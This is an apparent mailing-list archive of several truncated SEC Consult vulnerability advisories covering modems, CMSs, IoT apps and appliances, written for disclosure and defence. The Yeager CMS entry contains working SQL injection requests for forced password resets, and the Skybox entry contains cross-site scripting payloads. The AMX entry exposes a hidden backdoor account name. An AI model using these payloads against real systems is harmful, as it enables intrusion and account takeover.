SEC Consult SA-20160602-0 :: Multiple critical vulnerabilities in Ubee EVW3226 Advanced wireless voice gateway
SEC Consult Vulnerability Lab Security Advisory < 20160602-0 > === title: Multiple critical vulnerabilities product: Ubee EVW3226 Advanced wireless voice gateway vulnerable version: Firmware EVW3226_1.0.20 fixed version: - CVE number: - impact: critical homepage: http://www.ubeeinteractive.com found: 2016-01-09 by: Manuel Hofer (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubee Interactive is on a mission. A mission that began with the development of our industry-defining line of DOCSIS cable modems. And one that continues with a drive toward becoming the leading business-to-business provider of broadband connectivity products and solutions worldwide. Our current product portfolio includes data, voice, video, mobility and portable devices." Source: http://www.ubeeinteractive.com/products/cable/evw3226 Business recommendation: Network security should not depend on the security of independent devices, such as cable modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other cable modem users. Vulnerabilities described in this security advisory might be exploited in combination with other vulnerabilities not associated with this product (XSS in web forums accessing the modem, malvertising, etc.). It is highly recommended by SEC Consult not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Missing authentication for configuration download The admin interface does not explicitly require any authentication prior to downloading a previously requested configuration backup file. 2) Plaintext storage of administrative password The password for the user "admin" is stored in clear text. An attacker with access to the configuration file or the device itself, can easily obtain this password. By exploiting issue 1) the clear text admin password can be retrieved. 3) "Encrypted" configuration backup not actually encrypted A certain built in cgi action [removed] asks the user to provide a password in order to "encrypt your configuration's backup". A quick analysis of this function has shown that the configuration backup does not actually get encrypted, and only a file "pass.txt" is appended to the archive containing the password provided by the user, in cleartext. Additionally, this promotes a false sense of security as in this case, an attacker with access to the configuration file can easily obtain the clear text password for the admin interface. 4) Authenticated arbitrary file upload leading to arbitrary command execution By analyzing the configuration file format and further exploiting a known vulnerability inside the busybox tar implementation it is possible to upload arbitrary files to the device. This enables an attacker to execute arbitrary system commands and gain full root access on the device. 5) Heap-based buffer overflow vulnerability in URL decoding The function responsible for URL decoding allocates the buffer for the decoded string based on the number of '%' characters in the request string. This leads to a heap based buffer overflow. Proof of concept: - Since no public fix is available for any of the described vulnerabilities yet, the proof of concept will not be published. Vulnerable / tested versions: - The following firmware has been tested which was the most recent version at the time of discovery: EVW3226_1.0.20 Vendor contact timeline: 2016-01-13: Contacting CERT.at for security contact of UPC Austria (Liberty Global) 2016-01-17: Contacting vendor Ubee Interactive through 'eusupp...@ubeeinteractive.com' and 'eusa...@ubeeinteractive.com' requesting security contact. 2016-01-17: Disclosure of identified vulnerabilities to UPC Austria in advance. 2016-01-20: No reply from Ubee Interactive. Requesting direct contact through UPC Austria. 2016-01-22: Received contact at Ubee Interactive. Establishing contact with <michael@ubeeinteractive.com> again asking for public key to sen
SEC Consult SA-20160422-1 :: Multiple vulnerabilities in Digitalstrom Konfigurator
SEC Consult Vulnerability Lab Security Advisory < publishing date 20160422-1 > === title: Multiple vulnerabilities in Digitalstrom Konfigurator product: Digitalstrom Konfigurator vulnerable version: 1.10.0 fixed version: 1.10.4 CVE number: - impact: High homepage: http://www.digitalstrom.com/ found: 2015-10-01 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Digitalstrom is designed to systematically network all the electrical devices in your home. The control of light ambiances, security technology and household devices is just the start. You can simply download these new functions to your Digitalstrom server; they will install themselves automatically. And tomorrow has already become today." Source: http://www.digitalstrom.com/en/idea/Good-morning/ Business recommendation: SEC Consult recommends every user to sign out immediately after configuring the Digitalstrom installation in the Digitalstrom Konfigurator. This should prevent cross-site request forgery attacks. Furthermore every user should be aware that an attack could occure everytime when he clicks on an unknown link. However, SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Digitalstrom Konfigurator and increase the security of its customers. Vulnerability overview/description: --- 1) Multiple Persistent Cross-Site Scripting Digitalstrom Konfigurator suffers from multiple cross-site scripting vulnerabilities, which allow stealing session tokens and impersonation of other users in order to gain unauthorized access to the web interface. Furthermore it is possible to alter the contents of the interface in the context of the current user. 2) Cross-Site Request Forgery Digitalstrom Konfigurator doesn't implement any kind of cross-site request forgery protection. Due to that, attackers are able to execute arbitrary requests with the privileges of any user. The only requirement is, that a victim visits a malicious webpage. For example, an administrator can be forced to execute unwanted actions. Some of these actions are: -) Change network configuration -) Enable SSH service -) Turn various devices on and off Proof of concept: - Has been removed due to the request from the vendor. Vulnerable / tested versions: - Digitalstrom Konfigurator 1.10.0 Vendor contact timeline: 2015-11-09: Transmission of advisory via email 2015-12-02: As requested by Digitalstrom: New PoC for XSS 2016-01-31: Vendor released updated version 1.10.4 2016-04-22: Public advisory release Solution: - Upgrade to version 1.10.4. The effectiveness of the vendor's update was not verified by the SEC Consult Vulnerability Lab. Workaround: --- no workaround available Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Schober / @2015 signature.asc Description: OpenPGP digital signature
SEC Consult SA-20160422-0 :: Insecure credential storage in my devolo Android app
SEC Consult Vulnerability Lab Security Advisory < 20160422-0 > === title: Insecure data storage product: my devolo - android application - air.de.devolo.my.devolo vulnerable version: 1.2.8 fixed version: CVE number: impact: High homepage: http://www.devolo.com/ found: 2015-10-30 by: A. Nochvay (Office Moscow) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- devolo AG has been developing innovative Powerline and data communications products for private customers and professional users.devolo Home Control expands on the idea of the easy way to connect and is emerging as a new product world for the smart home that simply enables greater comfort and convenience, security and energy savings. URL: http://www.devolo.com/en/Company/devolo-AG Business recommendation: Attackers might be able to recover sensitive information from stolen/lost devices. With this information attackers can control user's smart devices, change temperature and watching user's remote camera. SEC Consult recommends not to store sensitive information on mobile devices. Vulnerability overview/description: --- The application "my devolo" uses the SharedPreferences android mechanism for storing information about the user including login credentials for the site mydevolo.com. In the event that an adversary physically attains the mobile device, the adversary might be able to hook up the mobile device to a computer with freely available software. These tools allow the adversary to see all third party application directories. Proof of concept: - Has been removed due to the request from the vendor. Vulnerable / tested versions: - The vulnerability has been discovered in "my devolo" version 1.2.8, which is the latest version in Google Play Store at this time. Vendor contact timeline: 2015-11-10: Transmission of advisory via a data-exchange platform provided by the vendor 2016-02-23: Confirmation of the described issue via email by vendor 2016-04-22: Public advisory release Solution: - no solution available Workaround: --- no workaround available Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Aleksandr Nochvay / @2015 signature.asc Description: OpenPGP digital signature
SEC Consult SA-20160210-0 :: Yeager CMS Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 SEC Consult Vulnerability Lab Security Advisory < 20160210-0 > === title: Multiple Vulnerabilities product: Yeager CMS vulnerable version: 1.2.1 fixed version: 1.3 CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570 , CVE-2015-7571, CVE-2015-7572 impact: Critical homepage: http://yeager.cm/en/home/ found: 2015-11-18 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- Yeager is an open source CMS that aims to become the most cost/time-effective solution for medium and large web sites and applications. Business recommendation: - Yeager CMS suffers from multiple vulnerabilities due to improper input validation and unprotected test scripts. By exploiting these vulnerabilities an attacker could: 1. Change user's passwords including the administrator's account. 2. Gain full access to the Yeager CMS database. 3. Determine internal servers that inaccessible from the Internet. 4. Attack other users of the Yeager CMS with Cross-Site Scripting. SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: - --- 1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568) 2. Post-authentication Blind SQL Injection (CVE-2015-7569) 3. Unauthenticated Arbitrary File Upload (CVE-2015-7571) 4. Unauthenticated Server-side Request Forgery (CVE-2015-7570) 5. Non-permanent Cross-site Scripting (CVE-2015-7572) Proof of concept: - - 1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568) http:///yeager/?action=passwordreset= http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70 =["noevent",{"yg_property":"setNewPassword","params":{"userToken":""}}] The vulnerability can also be used for unauthorized reset password of any user. In order to reset a specific user's password, an attacker will need to provide a valid email address of the user that he wants to attack. The email can be retrieved by either social engineering or using the aforementioned unauthenticated SQL injection vulnerability. http:///yeager/y.php/responder?handler=recoverLogin=sess_2=70 ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema il.com>","winID":"1"}}] The above URL just simply creates and sends a reset password token to the user's email. Next, even if attacker does not know the token, manipulating SQL commands allows to force to set the new password instantly. Note that new password MUST be at least 8 characters in length and must contain both letters and numbers. http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70 =["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui d=(select+id+from+yg_user+where+login='<vic...@email.com>')+limit+1--+-","userP assword":"","winID":"1"}}] 2. Post-authentication Blind SQL Injection (CVE-2015-7569) http:///yeager/y.php/tab_USERLIST POST Data: win_no=4_id=2-user_type=user=wid_4=1==sess_16000& lh=325_page=2_perpage=1_orderby=_orderdir=4_from=5_limit=6,7=1 3. Unauthenticated Arbitrary File Upload (CVE-2015-7571) A publicly known Arbitrary File Upload vulnerability of Plupload was found in Yeager CMS. Fortunately, to successfully exploit the vulnerability requires PHP directive "upload_tmp_dir" set to an existing directory and it must contain the writable directory "plupload". By default, the PHP directive "upload_tmp_dir" is an empty value. As a result, the script will attempt to upload a file to /plupload/ instead which generally does not exist on the filesystem. http:///yeager/ui/js/3rd/plupload/examples/upload.php 4. Unauthenticated Server-side Request Forgery (CVE-2015-7570) http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite.php http:///yeager/libs/org/adodb_lite/tests/test_datadictionary.php http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php The parameter "dbhost" can be used to perform internal port scan using
SEC Consult SA-20160121-0 :: Deliberately hidden backdoor account in AMX (Harman Professional) devices
Disclaimer: Although the backdoor vulnerability is quite a serious matter, we have published an accompanying blog post to this technical advisory which sheds a more funny light on this topic. Visit our blog at http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html for more information. SEC Consult Vulnerability Lab Security Advisory < 20160121-0 > === title: Deliberately hidden backdoor account product: Several AMX (HARMAN Professional) devices, see section "Vulnerable / tested versions" vulnerable version: v1.2.322, v1.3.100 for AMX NX-1200, multiple other products fixed version: untested hotfix and firmware updates available CVE number: CVE-2015-8362 impact: critical homepage: http://www.amx.com found: 2015-03-10 by: Matthias Klinski, Manuel Hofer (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "AMX® (www.amx.com) is part of the HARMAN Professional Division, and the leading brand for the business, education, and government markets for the company. As such, AMX is dedicated to integrating AV solutions for an IT World. AMX solves the complexity of managing technology with reliable, consistent and scalable systems comprising control and automation, system-wide switching and AV signal distribution, digital signage and technology management. AMX systems are deployed worldwide in conference rooms, homes, classrooms, network operation/command centers, hotels, entertainment venues and broadcast facilities, among others." Source: http://www.amx.com/automate/aboutamx.aspx Business recommendation: Attackers are able to completely compromise the affected devices as they can gain higher privileges than even administrative access to the system via the backdoor. It is highly recommended by SEC Consult not to use these products until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Deliberately hidden backdoor account While analysing the application binary /bin/bw, SEC Consult discovered a function called "setUpSubtleUserAccount" which adds an administrative account to the internal user database. This account can be used to log on to the web interface as well as SSH. Functions to retrieve a list of all users in the database were found to deliberately hide this user. Further, using this backdoor account grants additional features on the remote-cli, such as a facility to capture packets on the network interface which not even an administrator account can perform. Proof of concept: - The binary /bin/bw which provides core functionality as well as user management for the AMX NX-1200 implements a function called "setUpSubtleUserAccount", which is called on system boot. This function adds an administrative account with hardcoded credentials to the user database: STMFD SP!, {R4-R7,LR} LDR R4, =aMu1cqhrnyu4 ; "QmxhY2tXaWRvdw" SUB SP, SP, #0x44 ADD R12, R4, #0x38 ADD LR, SP, #0x58+cSubtleUserPassword MOV R5, this LDMIA R12!, {this-R3} ; "" STMIA LR!, {R0-R3} ADD R3, R4, #0x54 LDMIA R12, {R0,R1} MOV R4, #0 ADD R12, SP, #0x58+cSubtleUserUserName+0x10 STR R0, [LR],#4 STRBR4, [R12],#1 STRHR1, [LR],#2 ADD R6, SP, #0x58+cSubtleUserUserName By decoding the strings which are loaded from memory and passed as arguments to cSubtleUserPassword and cSubtleUserUserName, the following user and password can be recovered: user: BlackWidow password: Using these credentials a successful login has been performed to the web based management interface, as well as the command line interface. Using this backdoor account grants additional features on the command line interface, such as capturing packets on the network interface. Parts of the application which display a list of users are designed to deliberately hide the backdoor account. The backdoor did not get removed by AMX in their first patch, but the backdoor username has only been changed to a DC superhero name. The new username now was: 1MB@tMaN The hotfix from 2016-01-15 is untested by SEC Consult and it is unknown whether the backdoor has been removed properly now. Hence the password will not be published. Vulnerable / tested versions: - The following software versions of the
SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems
SEC Consult Vulnerability Lab released a new whitepaper titled: "Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems" - the dinosaurs want their vuln back Link to blog overview: -- Including slides from presentations on this topic (with details & demos on vulnerabilites & vendor responses): http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.html Direct link to whitepaper: --- https://www.sec-consult.com/fxdata/seccons/prod/media/Whitepaper_Bypassing_McAfees_Application_Whitelisting_for_critical_infrastructure_systems_v1%200.pdf Abstract: - This paper describes the results of the research conducted by SEC Consult Vulnerability Lab on the security of McAfee Application Control. This product is an example of an application whitelisting solution which can be used to further harden critical systems such as server systems in SCADA environments or client systems with high security requirements like administrative workstations. Application whitelisting is a concept which works by whitelisting all installed software on a system and after that prevent the execution of not whitelisted software. This should prevent the execution of malware and therefore protect against advanced persistent threat (APT) attacks. McAfee Application Control is an example of such a software. It can be installed on any system, however, the main field of application is the protection of highly critical infrastructures. While the core feature of the product is application whitelisting, it also supports additional security features including write- and read-protection as well as different memory corruption protections. The paper will show: * how application whitelisting can be bypassed in multiple ways * how User-Account-Control can be bypassed on such protected systems * how additional protections such as read- or write-protections can be bypassed * how additional memory corruption protections can easily be bypassed * that the software can decrease the overall security of your operating system ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult smime.p7s Description: S/MIME Cryptographic Signature
SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 SEC Consult Vulnerability Lab Security Advisory < 20151210-0 > === title: Multiple Vulnerabilities product: Skybox Platform vulnerable version: <=7.0.611 fixed version: 7.5.401 CVE number: impact: Critical homepage: www.skyboxsecurity.com/products/appliance found: 2014-12-04 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- "Skybox Security provides cutting-edge risk analytics for enterprise security management. Our solutions give you complete network visibility, help you eliminate attack vectors, and optimize your security management processes. Protect the network and the business." Source: http://www.skyboxsecurity.com/ Business recommendation: - Attackers are able to perform Cross-Site Scripting and SQL Injection attacks against the Skybox platform. Furthermore, it is possible for unauthenticated attackers to download arbitrary files and execute arbitrary code. SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all available vulnerabilities in the Skybox platform and increase the security of its customers. Vulnerability overview/description: - --- 1) Multiple Reflected Cross-Site Scripting Vulnerabilities 2) Multiple Stored Cross-Site Scripting Vulnerabilities 3) Arbitrary File Download and Directory Traversal Vulnerability 4) Blind SQL Injection Vulnerability 5) Remote Unauthenticated Code Execution Proof of concept: - - 1) Multiple Reflected Cross-Site Scripting Vulnerabilities Multiple scripts are prone to reflected Cross-Site Scripting attacks. The following example demonstrates this issue with the service VersionRepositoryWebService: POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0 Content-type: text/plain User-Agent: Axis/1.4 Host: localhost:8282 SOAPAction: "" Content-Length: 863 http://schemas.xmlsoap.org/soap/envelope/; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/; xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85 t;a xmlns:a=http://www.w3.org/1999/xhtmla:body onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601 Other scripts and parameters, such as the parameter status of the login script (located at https://localhost:444/login.html) are affected as well. The following request demonstrates this issue: https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc ument.cookie%29%3C/script%3E 2) Multiple Stored Cross-Site Scripting Vulnerabilities Multiple fields of the Skybox Change Manager, which can be accessed at https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting attacks. For example when creating a new ticket, the title can be misused to insert JavaScript code. The following request to the server demonstrates the issue: Request: POST /skyboxview/webskybox/tickets HTTP/1.1 Host: localhost:8443 [...] 7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer .modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer. netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel. TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8 52682809||skyboxview|test">|java.util.ArrayList/41 Other fields, like "Comments" and "Description", are affected as well. 3) Arbitrary File Download and Directory Traversal Vulnerability Skybox Change Manager allows to upload and download attachments for tickets. The download functionality can be exploited to download arbitrary files. No authentication is required to exploit this vulnerability.
SEC Consult SA-20151105-0 :: Insecure default configuration in Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20151105-0 > === title: Insecure default configuration product: various Ubiquiti Networks products vulnerable version: see Vulnerable / tested versions fixed version: none available impact: High homepage: https://www.ubnt.com/ found: 2015-08-17 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets. Source: http://ir.ubnt.com/ Vulnerability overview/description: --- 1) Hardcoded cryptographic keys A certificate including its private key is embedded in the firmware of several Ubiquiti Networks products. The certificate is used for HTTPS (default server certificate for web based management). Impersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks. Furthermore searching for the certificate fingerprint in data from internet-wide scans is a low-cost way of finding the IPs of specific products/product groups and allows an attacker to exploit vulnerabilities at scale. 2) Remote management enabled by default The remote management interface is enabled by default. This allows attackers to exploit vulnerabilities in the device firmware as well as weak credentials set by the user. Further information can also be found in our blog post: http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.html Proof of concept: - 1) Hardcoded cryptographic keys OpenSSL text output for the certificate: Certificate: Data: Version: 1 (0x0) Serial Number: 13408895465235657399 (0xba15f761dbb7b2b7) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com Validity Not Before: Jun 2 08:35:02 2011 GMT Not After : Jan 1 08:35:02 2020 GMT Subject: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (1024 bit) Modulus: 00:be:09:9f:14:3a:f7:ee:e5:8a:c9:76:b2:26:17: 00:7b:0c:85:1c:94:8e:bd:7f:f5:a1:a5:6d:0a:2c: 64:cc:7f:78:bc:11:ee:dc:d9:e6:2a:cb:e1:9e:d8: 17:a6:9c:35:aa:da:c5:c1:3a:a5:48:dc:af:bc:99: 37:59:7e:88:3c:2c:d3:bb:e7:60:6d:e3:19:f9:4e: 18:4c:4c:3a:fd:5e:35:6f:a3:50:b9:50:c0:8e:8b: fa:a0:ee:c4:96:c5:ba:4e:ed:d8:f1:18:05:36:89: 54:c2:dc:27:eb:75:74:1c:be:9a:4c:c8:e5:ce:fe: 47:44:96:a7:af:10:07:eb:15 Exponent: 65537 (0x10001) Signature Algorithm: sha1WithRSAEncryption 00:5a:31:81:3a:15:6d:30:95:8d:03:91:47:aa:23:e2:b4:c0: 2e:d4:01:cd:d5:21:6b:69:5e:3c:71:27:10:1c:f5:87:d4:28: 19:17:c2:3d:ec:36:fd:ee:93:07:8f:0b:30:65:0e:28:35:6c: 25:9e:d8:24:16:85:65:29:da:47:df:30:09:84:33:2c:b4:b4: fa:f0:24:40:b9:ee:1e:f0:1c:33:c3:e1:06:70:2e:6b:fe:a0: d0:aa:81:6f:cf:1b:70:67:43:01:32:a0:da:bc:8c:a8:91:f3: cb:b1:97:30:04:f2:c6:77:e8:89:97:2c:d3:1f:cf:03:f1:fc: 36:fa Certificate: -BEGIN CERTIFICATE- MIICrTCCAhYCCQC6Ffdh27eytzANBgkqhkiG9w0BAQUFADCBmjELMAkGA1UEBhMCV VMxCzAJBgNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcX VpdGkgTmV0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTA LBgNVBAMTBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wHhcN MTEwNjAyMDgzNTAyWhcNMjAwMTAxMDgzNTAyWjCBmjELMAkGA1UEBhMCVVMxCzAJB gNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcXVpdGkgTm V0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTALBgNVBAM TBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wgZ8wDQYJKoZI hvcNAQEBBQADgY0AMIGJAoGBAL4JnxQ69+7lisl2siYXAHsMhRyUjr1/9aGlbQosZ Mx/eLwR7tzZ5irL4Z7YF6acNaraxcE6pUjcr7yZN1l+iDws07vnYG3jGflOGExMOv 1eNW+jULlQwI6L+qDuxJbFuk7t2PEYBTaJVMLcJ+t1dBy+mkzI5c7+R0SWp
SEC Consult SA-20151022-0 :: Lime Survey Multiple Critical Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20151022-0 > === title: Multiple critical vulnerabilities product: Lime Survey vulnerable version: 2.05 up to 2.06+ Build 151014 fixed version: 2.06+ Build 151016 CVE number: impact: critical homepage: https://www.limesurvey.org/ found: 2015-10-12 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich - Bangkok https://www.sec-consult.com === Vendor description: - --- Lime Survey allows users to quickly create intuitive, powerful, online question-and-answer surveys that can work for tens to thousands of participants without much effort. The survey software itself is self-guiding for the respondents who are participating. Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of private persons, big companies, academic facilities and governmental institutions around the world. URL: https://www.limesurvey.org/en/about-limesurvey/references Business recommendation: - By combining the vulnerabilities documented in this advisory, unauthenticated remote attackers can completely compromise Lime Survey application server. - - Arbitrary local files can be downloaded - - Entire Lime Survey database can be accessed - - Arbitrary PHP code can be executed SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: - --- Due to the lack of function level access control many administrative functions in Lime Survey can be accessed by remote attackers without prior authentication. Moreover, the application did not validate some of user input properly. Unauthenticated attackers can pass specially crafted data to the entry points result in following vulnerabilities. 1. Unauthenticated local file disclosure An attacker can craft a malicious PHP serialized string containing a list of arbitrary files. This list can be sent to the Lime Survey backup feature for downloading without prior authentication. Any files accessible with the privileges of the web server user can be downloaded. 2. Unauthenticated database dump An attacker can request the database backup feature without authentication. The whole Lime Survey database can be downloaded including username and hashed password of the administrator account. 3. Unauthenticated arbitrary remote code execution An attacker can inject arbitrary PHP code into the application source code allowing to plant a malicious web backdoor to access underlying web server. 4. Multiple reflective cross-site scripting The application is prone to multiple reflective cross-site scripting vulnerabilities. Proof of concept: - - The vendor kindly asked SEC Consult to give people enough time to update their installations. Because of the high risk vulnerabilities, the proof of concept section has been removed from this advisory. Vulnerable / tested versions: - - The vulnerabilities have been tested on 2.06+ Build 150930 At least the following versions have been identified to be vulnerable: Version 2.05 Build 150413 up to 2.06+ Build 151014 Vendor contact timeline: - 2015-10-15: Contacting vendor through Lime Survey bug tracking system 2015-10-15: Vendor acknowledges existence of the vulnerabilities 2015-10-15: Urgent workaround is committed to Lime Survey's code repository 2015-10-16: Vendor asks for giving 6 weeks before disclosing the advisory 2015-10-16: Vendor releases Lime Survey 2.06+ Build 151016 with issues fixed 2015-10-22: SEC Consult releases security advisory without PoC Solution: - - Immediately upgrade to Lime Survey 2.06+ Build 151016 or later. https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015 Workaround: - --- No workaround available. Advisory URL: - - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich - Bangkok About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of n
SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network
